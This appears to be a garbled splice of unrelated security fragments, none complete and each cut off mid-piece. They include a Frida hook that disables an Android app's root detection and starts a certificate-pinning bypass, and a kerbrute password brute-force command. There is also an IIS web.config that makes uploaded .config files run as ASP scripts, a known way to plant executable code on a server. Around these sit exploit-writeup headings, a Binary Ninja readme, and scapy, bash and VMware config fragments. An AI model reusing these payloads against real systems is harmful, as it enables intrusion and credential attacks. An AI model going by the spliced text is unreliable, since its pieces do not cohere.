This PoC has been moved to an actual repo here.
setTimeout(function(){
Java.perform(function (){
console.log("[*] Script loaded")
var MenuActivity = Java.use("sg.vantagepoint.mstgkotlin.MenuActivity")
// Hook the root check on the class loaded above (the original referenced an undefined StartActivity variable)
MenuActivity.RootDetection.overload().implementation = function() {
console.log("[*] isDeviceRooted function invoked")
return false
}
console.log("");
console.log("[.] Cert Pinning Bypass/Re-Pinning");
Welcome to Jordan's grab-bag of common Binary Ninja Snippets.
These snippets are meant to run with the Binary Ninja Snippets Plugin
(http://github.com/Vector35/snippets), though they can all also be pasted
directly into the Python console or turned into stand-alone plugins if needed.
To install the entire collection at once, just install the Snippets plugin via
the plugin manager (CMD/CTL-SHIFT-M), confirm the Snippet Editor works
(Tool/Snippets/Snippet Editor), and unzip this bundle (Download ZIP above) into
your Snippets folder.
|=-----------------------------------------------------------------------=|
|=-------------=[ 3 Years of Attacking JavaScript Engines ]=-------------=|
|=-----------------------------------------------------------------------=|
|=------------------------------=[ saelo ]=------------------------------=|
|=-----------------------------------------------------------------------=|
The following are some brief notes about the changes that have taken place
since the release of the "Attacking JavaScript Engines" paper [1]. In
general, no big conceptual changes have happened since. Mitigations have
been added to break some of the presented techniques and, as expected, a
Heap Overflow Case Study: CVE-2015-3104 Proof of Concept
Heap Overflow Case Study: A Deeper Look at the Bug
Heap Overflow Case Study: Allocation Control
Heap Overflow Case Study: Gaining Read/Write Access to the Memory Space
Heap Overflow Case Study: Defeating ASLR
Heap Overflow Case Study: Gaining Code Execution
Heap Overflow Case Study: Stack Pivoting
Heap Overflow Case Study: Defeating DEP
Executing Shellcode and Restoring the Execution Flow
Sandbox Escape
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With the Rubeus version that includes the brute module:
# Imports
from scapy.all import *
from pprint import pprint
import operator
# Parameters
interface = "eth0" # Interface you want to use
dns_source = "local-ip" # IP of that interface
dns_destination = ["ip1","ip2","ip3"] # List of DNS server IPs
#!/bin/bash
ABOUT="piactl 0.10
Copyright (c) 2018-2020 Peeter P. Mõtsküla <peeterpaul@motskula.net>
https://gist.github.com/ppmotskula/4288167460de27d22225e4959c44c6c4
License: MIT License (https://opensource.org/licenses/MIT)
piactl helps you to install, configure and control CNIL's PIA software
(https://www.cnil.fr/en/open-source-pia-software-helps-carry-out-data-protection-impact-assesment)
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
Open the debugger VM's .vmx file, delete the existing serial0 lines (used for printing, not needed here) and add these lines:
serial0.present = "TRUE"
serial0.pipe.endPoint = "client"
serial0.fileType = "pipe"
serial0.yieldOnMsrRead = "TRUE"
serial0.tryNoRxLoss = "FALSE"
serial0.startConnected = "TRUE"